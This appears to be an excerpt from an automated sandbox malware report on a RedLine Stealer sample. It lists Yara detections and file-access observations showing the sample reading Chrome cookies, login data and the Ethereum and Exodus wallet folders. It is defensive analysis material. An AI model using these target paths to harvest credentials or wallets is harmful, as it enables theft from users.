Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Redline Clipper
Source: Yara match File source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.sistem.exe.be970.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.3.sistem.exe.2910000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000008.00000002.725269917.00000000000BD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.724529883.0000000002912000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.917454053.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sistem.exe PID: 5576, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 7016, type: MEMORYSTR
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Tries to steal Crypto Currency Wallets
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Yara detected Credential Stealer
Source: Yara match File source: 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR

Remote Access Functionality:

Yara detected RedLine Stealer
Source: Yara match File source: 0.2.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.c3b50.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe.36f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AppLaunch.exe PID: 5180, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP